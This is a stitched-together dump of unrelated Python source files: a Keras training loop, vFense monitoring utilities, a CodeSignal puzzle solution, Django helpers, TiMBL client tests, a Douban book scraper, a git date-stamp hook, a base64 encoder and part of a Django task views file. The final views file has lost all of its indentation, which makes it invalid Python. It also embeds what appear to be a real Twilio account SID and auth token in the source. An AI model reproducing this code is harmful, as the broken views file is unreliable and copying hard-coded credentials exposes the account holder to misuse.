    print('epoch %d start at %s' % (epoch, str(start)))
    log.write('-' * 60 + '\n')
    log.write('epoch %d start at %s\n' % (epoch, str(start)))

    train_loss = 0
    dev_loss = 0

    np.random.shuffle(train_data)

    for i in range(number_of_train_batches):
        train_batch = train_data[i * batch_size: (i + 1) * batch_size]
        embed_index, hash_index, pos, label, length, sentence = prepare.prepare_chunk(batch=train_batch, gram='bi')
        pos = np.array([(np.concatenate([np_utils.to_categorical(p, pos_length), np.zeros((step_length - length[l], pos_length))])) for l, p in enumerate(pos)])
        y = np.array([np_utils.to_categorical(each, output_length) for each in label])
        train_metrics = model.train_on_batch([embed_index, hash_index, pos], y)
        train_loss += train_metrics[0]
    all_train_loss.append(train_loss)

    correct_predict = 0
    all_predict = 0

    for j in range(number_of_dev_batches):
        dev_batch = dev_data[j * batch_size: (j + 1) * batch_size]
        embed_index, hash_index, pos, label, length, sentence = prepare.prepare_chunk(batch=dev_batch, gram='bi')
        pos = np.array([(np.concatenate([np_utils.to_categorical(p, pos_length), np.zeros((step_length - length[l], pos_length))])) for l, p in enumerate(pos)])
        y = np.array([np_utils.to_categorical(each, output_length) for each in label])

        # for loss
        dev_metrics = model.test_on_batch([embed_index, hash_index, pos], y)
        dev_loss += dev_metrics[0]

        # for accuracy
        prob = model.predict_on_batch([embed_index, hash_index, pos])
        for i, l in enumerate(length):
            predict_label = np_utils.categorical_probas_to_classes(prob[i])
            correct_predict += np.sum(predict_label[:l] == label[i][:l])
        all_predict += np.sum(length)

    epoch_accuracy = float(correct_predict) / all_predict
    all_dev_accuracy.append(epoch_accuracy)
    all_dev_loss.append(dev_loss)

    if epoch_accuracy >= best_accuracy:
        best_accuracy = epoch_accuracy
        best_epoch = epoch

    end = datetime.now()

    model.save('%s/model_epoch_%d.h5' % (folder_path, epoch), overwrite=True)

    print('epoch %d end at %s' % (epoch, str(end)))
    print('epoch %d train loss: %f' % (epoch, train_loss))
    print('epoch %d dev loss: %f' % (epoch, dev_loss))
    print('epoch %d dev accuracy: %f' % (epoch, epoch_accuracy))
    print('best epoch now: %d\n' % best_epoch)

    log.write('epoch %d end at %s\n' % (epoch, str(end)))
    log.write('epoch %d train loss: %f\n' % (epoch, train_loss))
    log.write('epoch %d dev loss: %f\n' % (epoch, dev_loss))
    log.write('epoch %d dev accuracy: %f\n' % (epoch, epoch_accuracy))
    log.write('best epoch now: %d\n\n' % best_epoch)

end_time = datetime.now()
print('train end at %s\n' % str(end_time))
log.write('train end at %s\n\n' % str(end_time))

timedelta = end_time - start_time
print('train cost time: %s\n' % str(timedelta))
print('best epoch last: %d\n' % best_epoch)
log.write('train cost time: %s\n\n' % str(timedelta))
log.write('best epoch last: %d\n\n' % best_epoch)

plot.plot_loss(all_train_loss, all_dev_loss, folder_path=folder_path, title='%s' % model_name)
plot.plot_accuracy(all_dev_accuracy, folder_path=folder_path, title='%s' % model_name)
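
# Illustrative usage (added; not part of the original file). A minimal sketch of
# reloading the best checkpoint saved above for inference; `best_epoch` is the
# value reported in the training log, and the inputs follow the same batch
# preparation as the dev loop.
#
# from keras.models import load_model
# best = load_model('%s/model_epoch_%d.h5' % (folder_path, best_epoch))
# predictions = best.predict([embed_index, hash_index, pos])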


# --- dtklein/vFense :: tp/src/plugins/monit/utils.py (license: lgpl-3.0) ---
import datetime
import time

import _db
from _db import Collection, Master

from vFense.db.client import r, db_create_close

AgentStatsKey = 'monit_stats'
AgentCollection = 'agents'


class MonitorKey():

    Memory = u'memory'
    FileSystem = u'file_system'
    Cpu = u'cpu'
    Timestamp = u'timestamp'


class Monitor():
    """
    Main monitoring class to manage data.
    """

    @staticmethod
    def save_memory_data(agent=None, data=None):
        """Saves memory data.

        Args:
            agent: The agent id the data belongs to.
            data: Basic data type (str, int, list, dict, etc) to save as is.
        """
        if not data or not agent:
            return None

        data = Monitor._totalfy(data)

        result = _db._save_data_point(
            agent=agent, collection=Collection.Memory, data=data
        )

        return result

    @staticmethod
    def save_cpu_data(agent=None, data=None):
        """Saves cpu data.

        Args:
            agent: The agent id the data belongs to.
            data: Basic data type (str, int, list, dict, etc) to save as is.
        """
        if not data or not agent:
            return None

        result = _db._save_data_point(
            agent=agent, collection=Collection.Cpu, data=data
        )

        return result

    @staticmethod
    def save_file_system_data(agent=None, data=None):
        """Saves file system data.
        """
        if not data or not agent:
            return None

        new_data = []
        for fs in data:
            new_data.append(Monitor._totalfy(fs))

        result = _db._save_data_point(
            agent=agent, collection=Collection.FileSystem, data=new_data
        )

        return result

    @staticmethod
    def get_memory_data_since(agent=None, date_time=None):
        """Gets all the memory data.

        Args:
            agent: The agent id the data belongs to.
            date_time: A datetime to get all data since.

        Returns:
            A list of data points. None otherwise.
        """
        if (
            not agent
            or not date_time
            or not isinstance(date_time, datetime.datetime)
        ):
            return None

        timestamp = date_time.strftime('%s')

        return _db._get_data_points_since(
            agent=agent, collection=Collection.Memory, timestamp=timestamp
        )

    @staticmethod
    def get_cpu_data_since(agent=None, date_time=None):
        """Gets all the cpu data.

        Args:
            agent: The agent id the data belongs to.
            date_time: A datetime to get all data since.

        Returns:
            A list of data points. None otherwise.
        """
        if (
            not agent
            or not date_time
            or not isinstance(date_time, datetime.datetime)
        ):
            return None

        timestamp = date_time.strftime('%s')

        return _db._get_data_points_since(
            agent=agent, collection=Collection.Cpu, timestamp=timestamp
        )

    @staticmethod
    def get_file_system_data_since(agent=None, date_time=None):
        """Gets all the file system data.

        Args:
            agent: The agent id the data belongs to.
            date_time: A datetime to get all data since.

        Returns:
            A list of data points. None otherwise.
        """
        if (
            not agent
            or not date_time
            or not isinstance(date_time, datetime.datetime)
        ):
            return None

        timestamp = date_time.strftime('%s')

        return _db._get_data_points_since(
            agent=agent, collection=Collection.FileSystem, timestamp=timestamp
        )

    @staticmethod
    def _totalfy(data):
        try:
            data['total'] = int(data['free']) + int(data['used'])
        except Exception as e:
            data['total'] = 0

        return data

    @staticmethod
    @db_create_close
    def get_agent_memory_stats(agent=None, conn=None):
        """Gets memory stats directly from the agents collection.

        Args:
            agent: Agent id to retrieve stats from.
        """
        if not agent:
            return None

        try:
            stats = (
                r
                .table(AgentCollection)
                .get(agent)
                .pluck(AgentStatsKey)
                .run(conn)
            )
            stats = stats[AgentStatsKey]

            if stats:
                memory = stats[MonitorKey.Memory]
                memory[MonitorKey.Timestamp] = stats[MonitorKey.Timestamp]
                return memory
        except Exception as e:
            # TODO: log here
            pass

        return None

    @staticmethod
    @db_create_close
    def get_agent_cpu_stats(agent=None, conn=None):
        """Gets cpu stats directly from the agents collection.

        Args:
            agent: Agent id to retrieve stats from.
        """
        if not agent:
            return None

        try:
            stats = (
                r
                .table(AgentCollection)
                .get(agent)
                .pluck(AgentStatsKey)
                .run(conn)
            )
            stats = stats[AgentStatsKey]

            if stats:
                cpu = stats[MonitorKey.Cpu]
                cpu[MonitorKey.Timestamp] = stats[MonitorKey.Timestamp]
                return cpu
        except Exception as e:
            # TODO: log here!!
            pass

        return None

    @staticmethod
    @db_create_close
    def get_agent_file_system_stats(agent=None, conn=None):
        """Gets file_system stats directly from the agents collection.

        Args:
            agent: Agent id to retrieve stats from.
        """
        if not agent:
            return None

        try:
            stats = (
                r
                .table(AgentCollection)
                .get(agent)
                .pluck(AgentStatsKey)
                .run(conn)
            )
            stats = stats[AgentStatsKey]

            if stats:
                fs = []
                for _fs in stats[MonitorKey.FileSystem]:
                    _fs[MonitorKey.Timestamp] = stats[MonitorKey.Timestamp]
                    fs.append(_fs)
                return fs
        except Exception as e:
            # TODO: log here
            pass

        return None


def save_monitor_data(agent=None, **kwargs):
    """A catch all function to save monitoring data.

    Parameters are basic data type (str, int, list, dict, etc) to save as is.

    Args:
        agent: The agent id the data belongs to.
        kwargs: Keys corresponding to monitor.MonitorKey

    Returns:
        True if data was saved, False otherwise.
    """
    if not agent:
        return None

    memory = kwargs.get(MonitorKey.Memory)
    fs = kwargs.get(MonitorKey.FileSystem)
    cpu = kwargs.get(MonitorKey.Cpu)

    _mem = None
    _cpu = None
    _fs = None

    if (
        not memory
        and not cpu
        and not fs
    ):
        return None

    result = {}

    if memory:
        _mem = Monitor.save_memory_data(agent, memory)
        result[MonitorKey.Memory] = _mem

    if cpu:
        _cpu = Monitor.save_cpu_data(agent, cpu)
        result[MonitorKey.Cpu] = _cpu

    if fs:
        _fs = Monitor.save_file_system_data(agent, fs)
        result[MonitorKey.FileSystem] = _fs

    return result


def get_monitor_data_since(agent=None, timestamp=None):
    """A catch all function to get all monitoring data.

    Gets the monitoring data since the arguments provided. If all are None,
    then the default of 5 hours is used.

    Args:
        agent: The agent id the data belongs to.
        timestamp: Unix timestamp to get data since.

    Returns:
        A dict with monitor.MonitorKey key. It's possible for values to be None.
    """
    _mem = Monitor.get_memory_data_since()
    _cpu = Monitor.get_cpu_data_since()
    _fs = Monitor.get_file_system_data_since()

    data = {}
    data[MonitorKey.Memory] = _mem
    data[MonitorKey.Cpu] = _cpu
    data[MonitorKey.FileSystem] = _fs

    return data


@db_create_close
def update_agent_monit_stats(agent=None, **kwargs):
    memory = kwargs.get(MonitorKey.Memory)
    cpu = kwargs.get(MonitorKey.Cpu)
    fs = kwargs.get(MonitorKey.FileSystem)
    conn = kwargs.get('conn')

    agent_stats = {}
    stats = {}
    stats['memory'] = Monitor._totalfy(memory)
    stats['cpu'] = cpu
    stats['timestamp'] = int(time.time())

    fs_list = []
    for _fs in fs:
        fs_list.append(Monitor._totalfy(_fs))
    stats['file_system'] = fs_list

    agent_stats[AgentStatsKey] = stats

    (
        r
        .table(AgentCollection)
        .get(agent)
        .update(agent_stats)
        .run(conn, no_reply=True)
    )
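
# Illustrative usage (added; not part of the original file). A rough sketch of
# how an agent check-in handler might persist a stats payload, assuming a
# reachable RethinkDB backend; the payload keys follow MonitorKey above.
def _example_checkin(agent_id, payload):
    saved = save_monitor_data(
        agent=agent_id,
        memory=payload.get('memory'),
        cpu=payload.get('cpu'),
        file_system=payload.get('file_system'),
    )
    latest_memory = Monitor.get_agent_memory_stats(agent=agent_id)
    return saved, latest_memory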


# --- Zubieta/CPP :: CodeSignal/Arcade/The_Core/Level_06_Labyrinth_Of_Nested_Loops/044_Is_Sum_Of_Consecutive_2.py (license: mit) ---
# https://app.codesignal.com/arcade/code-arcade/labyrinth-of-nested-loops/EQSjA5PRfyHueeNkj

def isSumOfConsecutive2(n):
    # Find the number of ways to express n as a sum of some (at least two)
    # consecutive positive integers.
    # e.g. isSumOfConsecutive2(9) == 2, 2+3+4==9, 4+5==9.
    # count = 0
    # for i in range(0, n):
    #     for j in range(i, n):
    #         if sum(range(i, j)) == n:
    #             count += 1
    # return count
    combinations = set([])
    # Consecutive values that add up to a certain number have the number divided by the
    # amount of values at their center.
    # e.g. 9/3 ~ 2, [3], 4
    #      9/2 ~ 4, [4.5], 5
    for i in range(2, n + 1):
        # Find the value at the center.
        m = n // i
        v = []
        # Find the values at both sides of the centers.
        for j in range(i):
            if i % 2 == 0:
                value = m - i // 2 + 1 + j
            else:
                value = m - i // 2 + j
            if value > 0:
                v.append(value)
        # Check if all values add up to original value.
        if sum(v) == n:
            combinations.add(",".join(map(str, v)))
    # Return possible amount of combinations of consecutive numbers that add up to n.
    return len(combinations)
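
# Quick sanity checks (added; not part of the original solution), using the
# worked example from the comments above plus two easy hand-checked values.
assert isSumOfConsecutive2(9) == 2   # 2+3+4 and 4+5
assert isSumOfConsecutive2(8) == 0   # powers of two have no such decomposition
assert isSumOfConsecutive2(15) == 3  # 1+2+3+4+5, 4+5+6, 7+8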


# --- blacksph3re/alastair :: cooking/helpers.py (license: gpl-2.0) ---
import csv, codecs
import math

from django.core.exceptions import ValidationError
from django.core.urlresolvers import resolve
from django.db.models import F, ExpressionWrapper, FloatField, IntegerField, CharField, Case, When, Sum, Func, Min, Q
from django.template.defaulttags import register

from .models import Project, Ingredient, Inventory_Item, MEASUREMENTS, Receipe, Meal_Receipe


def validate_positive(value):
    if(value < 0):
        raise ValidationError('Please enter a positive value', code='negative-value')


def validate_greater_zero(value):
    if(value <= 0):
        raise ValidationError('Please enter a value greater than zero', code='not-zero')


MEASUREMENTS = (
    ('ml', 'Milliliter'),
    ('g', 'Gram'),
    ('n', 'Piece'),
)


@register.filter(name='get_item')
def get_item(dictionary, key):
    return dictionary.get(key)


def conv_measurement(measurement, quantity):
    if(measurement == 'n'):
        if(quantity == 1):
            return 'piece'
        return 'pieces'
    return measurement


def prepareContext(request):
    context = {}
    if('activate_project' in request.GET):
        try:
            request.session['active_project'] = int(request.GET.get('activate_project'))
        except:
            try:
                del request.session['active_project']
            except:
                pass
    try:
        context['active_project'] = Project.objects.get(id=request.session['active_project'])
    except:
        pass
    context['active_page'] = resolve(request.path_info).url_name
    context['pagetitle'] = context['active_page']
    return context


## Ugly thing: if we can import the python2-module, define stuff...
try:
    import cStringIO

    def _smallhelpforunicode(arg):
        if(arg == None):
            return ''
        return unicode(arg)

    class UnicodeWriter:
        """
        A CSV writer which will write rows to CSV file "f",
        which is encoded in the given encoding.
        """

        def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
            # Redirect output to a queue
            self.queue = cStringIO.StringIO()
            self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
            self.stream = f
            self.encoder = codecs.getincrementalencoder(encoding)()

        def writerow(self, row):
            self.writer.writerow([_smallhelpforunicode(s).encode("utf-8") for s in row])
            # Fetch UTF-8 output from the queue ...
            data = self.queue.getvalue()
            data = data.decode("utf-8")
            # ... and reencode it into the target encoding
            data = self.encoder.encode(data)
            # write to the target stream
            self.stream.write(data)
            # empty queue
            self.queue.truncate(0)

        def writerows(self, rows):
            for row in rows:
                self.writerow(row)
except:
    pass
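
# Illustrative usage (added; not part of the original file). A minimal sketch of
# the Python 2 CSV export path this module supports; only meaningful where the
# cStringIO import above succeeded, and the output path is a placeholder.
def _example_export(rows):
    with open('/tmp/export.csv', 'wb') as fh:
        writer = UnicodeWriter(fh)
        writer.writerow([u'ingredient', u'quantity'])
        writer.writerows(rows)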


# --- emsrc/timbl-tools :: test/test_client.py (license: gpl-3.0) ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
test TimblClient class
"""

import logging
import unittest

from tt.server import TimblServer
from tt.client import TimblClient, TimblClientError

from common import DATA_DIR


SERVER = None


def start_timbl_server():
    global SERVER
    options = "-f {0}/dimin.train".format(DATA_DIR)
    SERVER = TimblServer(timbl_opts=options)
    SERVER.start()


class Test_TimblClient(unittest.TestCase):

    def setUp(self):
        if not SERVER:
            start_timbl_server()
        self.client = TimblClient(SERVER.port)
        self.client.connect()

    def test_disconnect(self):
        self.client.disconnect()
        self.assertRaises(TimblClientError, self.client.query)
        self.assertFalse(self.client.socket)

    def test_reconnect(self):
        self.client.reconnect()
        self.client.query()

    def test_connection_timeout(self):
        # send incomplete command so server does not reply
        self.client.socket.settimeout(1)
        self.assertRaises(TimblClientError,
                          self.client.set,
                          "-k")
        self.client.socket.settimeout(10)

    def test_query(self):
        # repeat multiple times, because recv in multiple parts occurs rarely
        for i in range(25):
            status = self.client.query()
            ## print status
            self.assertEqual(status["NEIGHBORS"], "1")

    def test_set(self):
        self.client.set("-k 10 -d IL")
        status = self.client.query()
        self.assertEqual(status["NEIGHBORS"], "10")
        self.assertEqual(status["DECAY"], "IL")
        self.client.set("-k 1 -d Z")

    def test_set_error(self):
        self.assertRaises(TimblClientError,
                          self.client.set,
                          "-w 1")

    def test_classify(self):
        """
        Exhaustively test classification with any combination of the verbose
        output options +/-vdb (distribution), +/-vdi (distance) and +/-vn
        (neighbours). The +/-vk seems to be unsupported, as it cannot be "set"
        through the server
        """
        self.client.set("-k10")

        for db in "+vdb -vdb".split():
            for di in "+vdi -vdi".split():
                for vn in "+vn -vn".split():
                    self.client.set(db + " " + di + " " + vn)

                    for i, inst in enumerate(open(DATA_DIR + "/dimin.train")):
                        if i > 10:
                            break
                        result = self.client.classify(inst)
                        self.assertTrue(result.has_key("CATEGORY"))

                        if db == "+vdb":
                            self.assertTrue(result.has_key("DISTRIBUTION"))
                        else:
                            self.assertFalse(result.has_key("DISTRIBUTION"))

                        if di == "+vdi":
                            self.assertTrue(result.has_key("DISTANCE"))
                        else:
                            self.assertFalse(result.has_key("DISTANCE"))

                        if vn == "+vn":
                            self.assertTrue(result.has_key("NEIGHBOURS"))
                        else:
                            self.assertFalse(result.has_key("NEIGHBOURS"))

        self.client.set("-k1 -vdb -vdi -vn")

    def test_classify_error(self):
        self.assertRaises(TimblClientError,
                          self.client.classify,
                          "x, x, x, x")

    def test_log(self):
        # quick & global config of logging system so output of loggers
        # goes to stdout
        logging.basicConfig(level=logging.DEBUG,
                            format="%(levelname)-8s <%(name)s> :: %(message)s")
        self.client = TimblClient(SERVER.port, log_tag="test_log_client")
        self.client.connect()

        instances = open(DATA_DIR + "/dimin.train").readlines()

        for inst in instances[:2]:
            self.client.classify(inst)

        self.client.query()
        self.client.set("+vdb +vdi +vn")

        for inst in instances[:2]:
            self.client.classify(inst)

        try:
            self.client.classify("x, x")
        except TimblClientError:
            pass

        try:
            self.client.set("-w 1")
        except TimblClientError:
            pass

        self.client.disconnect()
        # global reset of logging level
        logging.getLogger().setLevel(logging.CRITICAL)

    def tearDown(self):
        self.client.disconnect()


if __name__ == '__main__':
    import sys
    sys.argv.append("-v")
    unittest.main()


# --- cp4/doubanInterface :: src/doubanInterface.py (license: mit) ---
# -*- coding: utf-8 -*-

import re
import urllib2
import time
import json


class bookIf:

    def __init__(self, youth_booklist_url, author_booklist_url):
        self.youth_booklist_url = youth_booklist_url
        self.author_booklist_url = author_booklist_url

    def get_group_booklist(self, group_id):
        if group_id != "youth" and group_id != "author":
            return None
        if group_id == "youth":
            if not self.youth_booklist_url:
                return None
            else:
                return self.__get_douban_booklist(self.youth_booklist_url)
        if group_id == "author":
            if not self.author_booklist_url:
                return None
            else:
                return self.__get_douban_booklist(self.author_booklist_url)

    def get_member_booklist(self, member_id, list_type='wish'):
        root_url = "http://book.douban.com/people/" + member_id
        if list_type == "wish":
            full_url = root_url + "/wish"
            return self.__get_douban_people_readlist(full_url, False)  # for wish list, book rating is meaningless, False for not get rating.
        elif list_type == "reading":
            full_url = root_url + "/do"
            return self.__get_douban_people_readlist(full_url)
        elif list_type == "done":
            full_url = root_url + "/collect"
            return self.__get_douban_people_readlist(full_url)
        else:
            return None

    def get_book_info(self, book_id):
        root_api = 'https://api.douban.com/v2/book/'
        api = root_api + book_id
        response = urllib2.urlopen(api)
        book_info = json.loads(response.read())
        #print book_info['isbn10']
        #print book_info['isbn13']
        return book_info

    def __get_douban_booklist(self, url):
        item = 0
        total_book_list = []
        while True:
            full_url = url + "?start={0}&sort=time".format(item)
            response = urllib2.urlopen(full_url)
            #print "=============================================read page " + str(item/25+1) + "==================================================="
            #print urlcheck
            html_text = response.read()
            #print html_text
            #print "===============================================================raw and one line============================================================="
            #oneline_html_text = raw_html.replace('\n', ' ').replace('\r', '')
            #striped_html = raw_html.strip('\n')
            #striped_html = striped_html.strip('\r')
            #striped_html = striped_html.strip('\n')
            html_text_list = html_text.splitlines()
            book_list = []
            for i in range(0, len(html_text_list)):
                if html_text_list[i].find('<div class="title">') >= 0:
                    #rematch = re.match(r'(http://book.douban.com/subject/)([0-9]+)(/)', html_text_list[i+1])
                    rematch = re.search('(?<=subject/)\d+', html_text_list[i+1])
                    if rematch:
                        book_id = rematch.group(0)
                        book_name = html_text_list[i+2].strip()
                        book_info = {"book_id": "", "book_name": ""}
                        book_info['book_id'] = book_id
                        book_info['book_name'] = book_name
                        #print book_info
                        book_list.append(book_info)
            if book_list:
                #print book_list
                total_book_list += book_list
                item += 25
                time.sleep(1)  # sleep 1 second to avoid being blocked by douban.com for frequent access.
            else:
                break
        #print total_book_list
        return total_book_list

    def __get_douban_people_readlist(self, url, WANT_RATING=True):
        item_num = 0
        total_book_list = []
        while True:
            #print "=============================================read page " + str(item_num/15+1) + "==================================================="
            full_url = url + "?start={0}&sort=time".format(item_num)
            response = urllib2.urlopen(full_url)
            html_text = response.read()
            html_text_list = html_text.splitlines()
            book_list = []
            got_book_title = False  # used for search book rating. only after a book title is found, book rating is to be searched.
            for html_line in html_text_list:
                book_info = {"book_id": "", "book_name": "", "rating": 0}
                if WANT_RATING and got_book_title:
                    rate_search = re.search('(<span class="rating)(\d)(-t"></span>)', html_line)
                    if rate_search:
                        book_rating = rate_search.group(2)
                        book_list[len(book_list)-1]["rating"] = int(book_rating)
                    got_book_title = False
                    continue
                search_result = re.search('(http://book.douban.com/subject/)(\d+)(/)(.+)(title=")(.+)(")', html_line)
                if search_result:
                    book_id = search_result.group(2)
                    book_name = search_result.group(6)
                    book_info['book_id'] = book_id
                    book_info['book_name'] = book_name
                    book_list.append(book_info)
                    got_book_title = True
            if book_list:
                total_book_list += book_list
                item_num += 15
                #print book_list
                time.sleep(1)  # sleep 1 second to avoid being blocked by douban.com for frequent access.
            else:
                break
        return total_book_list
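
# Illustrative usage (added; not part of the original file). A rough sketch,
# assuming network access to douban.com; the group URLs and member id below are
# placeholders, not values from the original project.
def _example_fetch_wishlist():
    api = bookIf('http://book.douban.com/doulist/0000001/',
                 'http://book.douban.com/doulist/0000002/')
    wishlist = api.get_member_booklist('some_member_id', list_type='wish')
    return wishlist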


# --- elationfoundation/git_hooks :: pre-commit/utils/date_stamp.py (license: gpl-2.0) ---
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import os
import sys
import re
import subprocess
from datetime import datetime


def system(*args, **kwargs):
    kwargs.setdefault('stdout', subprocess.PIPE)
    proc = subprocess.Popen(args, **kwargs)
    out, err = proc.communicate()
    return out


def now():
    """Current date-time"""
    #return str(datetime.now())[:16]
    return datetime.now().strftime('%Y-%m-%d %H:%M')


if __name__ == '__main__':
    modified = re.compile('^[ACM]+\s+(?P<name>.*\.py)', re.MULTILINE)
    # decode: subprocess pipes return bytes under Python 3
    files = modified.findall(system('git', 'status', '--porcelain').decode('utf-8'))
    for name in files:
        # watching ruby | python | lua scripts
        if re.search(r"(\.py|\.rb|\.lua)$", name):
            # current script text
            with open(name, 'r') as fd:
                script = fd.read()
            # change modification date
            script = re.sub('(@changed\s*:\s+)\d{4}-\d{2}-\d{2} \d{2}:\d{2}',
                            lambda m: m.group(1) + now(), script)
            # change script revision
            script = re.sub('(@revision\s*:\s+)(\d+)',
                            lambda m: m.group(1) + str(int(m.group(2))+1), script)
            # change script version
            script = re.sub('(__version__\s*=\s*\d+\.\d+\.)(\d+)',
                            lambda m: m.group(1) + str(int(m.group(2))+1), script)
            # write back to script
            with open(name, 'w') as fd:
                fd.write(script)
            # add changes to commit
            system('git', 'add', name)
    sys.exit(0)
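
# Illustrative usage (added; not part of the original hook). The hook rewrites
# stamp tags like the ones below when a staged script contains them — a sample
# header with invented values:
#
#   # @changed  : 2017-01-01 12:00
#   # @revision : 41
#   __version__ = 0.1.41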


# --- hightemp/cappMiniWebServer :: temporary/encode.py (license: mit) ---
import base64
import os
from os.path import *

aDirectories = ['templates', 'assets']
sCurrentDir = os.path.dirname(os.path.abspath(__file__))
sTempDir = join(sCurrentDir, 'temporary')


def fnEcodeFilesInDir(in_sCurrentPath, in_sTempPath):
    for sFileName in os.listdir(in_sCurrentPath):
        sAbsolutePath = join(in_sCurrentPath, sFileName)
        sAbsoluteTempPath = join(in_sTempPath, sFileName)
        print(sAbsolutePath)
        if isdir(sAbsolutePath):
            if not isdir(sAbsoluteTempPath):
                os.makedirs(sAbsoluteTempPath)
            fnEcodeFilesInDir(sAbsolutePath, sAbsoluteTempPath)
    for sFileName in os.listdir(in_sCurrentPath):
        sAbsolutePath = join(in_sCurrentPath, sFileName)
        sAbsoluteTempPath = join(in_sTempPath, sFileName)
        print(sAbsolutePath)
        if isfile(sAbsolutePath):
            try:
                objReadFileHandler = file(sAbsolutePath, "r")
                sBase64Encoded = base64.b64encode(objReadFileHandler.read())
                objWriteFileHandler = file(sAbsoluteTempPath + ".base64", "w")
                objWriteFileHandler.write(sBase64Encoded)
                objWriteFileHandler.close()
                objReadFileHandler.close()
            except Exception as objException:
                print(objException)


for sDirectory in aDirectories:
    sAbsolutePath = join(sCurrentDir, sDirectory)
    sAbsoluteTempPath = join(sTempDir, sDirectory)
    if isdir(sAbsolutePath):
        if not isdir(sAbsoluteTempPath):
            os.makedirs(sAbsoluteTempPath)
        fnEcodeFilesInDir(sAbsolutePath, sAbsoluteTempPath)
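
# Illustrative usage (added; not part of the original file). A minimal sketch of
# decoding one of the generated ".base64" files back to its original bytes; the
# path is a placeholder.
def _fnExampleDecode(sEncodedPath):
    with open(sEncodedPath, 'r') as objHandler:
        return base64.b64decode(objHandler.read())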


# --- SlashRoot/WHAT :: what_apps/do/views.py ---
from .forms import TaskForm, TaskPrototypeNameForm, TaskPrototypeForm, \
GenerateTaskForm, RestOfTheTaskPrototypeForm
from .models import Task, TaskProgeny, Verb, TaskPrototype, TaskPrototypeProgeny, \
TaskOwnership, TaskResolution, TaskAccessPrototype, TaskAccess, Protocol
from django import forms
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User, Group
from django.contrib.contenttypes.models import ContentType
from django.db.models import Max, Count, Q
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect, get_object_or_404
from django.template import loader, Context, Template, RequestContext
from django.utils.datastructures import MultiValueDictKeyError
from django.views.decorators.cache import never_cache
from what_apps.presence.models import SessionInfo
from taggit.models import Tag
from twilio.util import TwilioCapability
from what_apps.utility.forms import AutoCompleteField
from what_apps.mellon.models import Privilege, get_privileges_for_user
from what_apps.people.models import GenericParty
from what_apps.social.forms import DrawAttentionAjaxForm, MessageForm
from what_apps.social.models import TopLevelMessage
from what_apps.social.views import post_top_level_message
import stomp
import json
#from twilio.Utils import token
T = ContentType.objects.get_for_model(Task)
@login_required
def landing(request):
tasks = Task.objects.can_be_seen_by_user(request.user).order_by('-created')
manual_tasks = tasks.filter(ownership__isnull = True).exclude(creator__username = "AutoTaskCreator")[:10]
task_messages = TopLevelMessage.objects.filter(content_type = T).order_by('-created')[:7]
return render(request, 'do/do_landing.html', locals())
def public_list(request):
'''
Displays tasks that are viewable with the privilege "Anybody in <group_name>"
'''
if not request.user.is_authenticated():
try:
group_name = request.GET['group']
except MultiValueDictKeyError:
return HttpResponseRedirect('/presence/login?next=/do/public_list/')
group = Group.objects.get(name=group_name)
privilege = get_object_or_404(Privilege, prototype__name="Anybody", jurisdiction=group)
access_objects = TaskAccess.objects.filter(prototype__privilege = privilege)
verbs = Verb.objects.filter(prototypes__instances__resolutions__isnull = True).annotate(num_tasks=Count('prototypes__instances')).order_by('-num_tasks')
else:
verbs = Verb.objects.filter(prototypes__instances__resolutions__isnull = True).annotate(num_tasks=Count('prototypes__instances')).order_by('-num_tasks')
tags = Tag.objects.filter(taggit_taggeditem_items__content_type = T).distinct() #TODO: Privileges
return render(request,
'do/three_column_task_list.html',
locals()
)
@never_cache
@login_required
def big_feed(request):
'''
Look at the big board! They're gettin' ready to clobber us!
'''
user_privileges = get_privileges_for_user(request.user)
tasks = Task.objects.filter(access_requirements__prototype__privilege__in = user_privileges, resolutions__isnull = True).order_by('-created')[:10]
ownerships = list(TaskOwnership.objects.filter(task__resolutions__isnull=True).order_by('-created')[:10])
task_messages = list(TopLevelMessage.objects.filter(content_type = T))
task_resolutions = list(TaskResolution.objects.order_by('-created')[:10])
sessions = list(SessionInfo.objects.order_by('-created')[:10])
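    # Merge the heterogeneous activity records into one newest-first stream; each
    # item is paired with its model name so the template can dispatch on type.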
task_activity = task_messages + task_resolutions + ownerships + sessions
sorted_task_activity = sorted(task_activity, key=lambda item: item.created, reverse=True)[:10]
activity_list = []
for item in sorted_task_activity:
activity_list.append((item, str(item._meta).split('.')[1]))
return render(request,
'do/do_news_feed.html',
locals()
)
#def three_column_task_list(request):
#
# verbs = Verb.objects.annotate(tasks = Count('prototypes__instances')).order_by('-tasks')
#
# return render(request,
# 'do/three_column_task_list.html',
# locals()
# )
@login_required
def task_profile(request, task_id):
task = get_object_or_404(Task, id = task_id)
#It wasn't bad enough that the actual create form was wet and silly. Now this too. TODO: FIX THIS FUCKER.
user_can_make_new_prototypes = True #TODO: Turn this into an actual privilege assessment
task_prototype_name_form = TaskPrototypeNameForm()
task_prototype_name_form.fields['name'].widget.attrs['class'] = "topLevel" #So that we can recognize it later via autocomplete.
rest_of_the_task_prototype_form = RestOfTheTaskPrototypeForm()
user_privileges = get_privileges_for_user(request.user)
#Wet and silly. TODO: Fix
class SimpleChildForm(forms.Form):
child = AutoCompleteField(models = (TaskPrototype,), name_visible_field=True)
class SimpleParentForm(forms.Form):
parent = AutoCompleteField(models = (TaskPrototype,), name_visible_field=True)
task_prototype_form = TaskPrototypeForm()
task_prototype_parent_form = SimpleParentForm()
task_prototype_child_form = SimpleChildForm()
draw_attention_ajax_form = DrawAttentionAjaxForm()
if task.prototype.id == 251 or task.prototype.id == 7:
has_outgoing_call = True
disable_incoming_calls = True
account_sid = "AC260e405c96ce1eddffbddeee43a13004"
auth_token = "fd219130e257e25e78613adc6c003d1a"
capability = TwilioCapability(account_sid, auth_token)
capability.allow_client_outgoing("APd13a42e60c91095f3b8683a77ee2dd05")
#The text of the call recipient will be the name of the person in the case of a tech job. It will be the output of the unicode method of the PhoneNumber in the case of a PhoneCall resolution.
if task.prototype.id == 251:
call_to_name = task.related_objects.all()[0].object.get_full_name()
related_user = task.related_objects.all()[0].object
phone_numbers = task.related_objects.all()[0].object.userprofile.contact_info.phone_numbers.all()
if task.prototype.id == 7:
phone_numbers = [task.related_objects.all()[0].object.from_number]
if task.related_objects.all()[0].object.from_number.owner:
call_to_name = task.related_objects.all()[0].object.from_number.owner
else:
call_to_name = "Phone Number #%s" % (str(task.related_objects.all()[0].object.id))
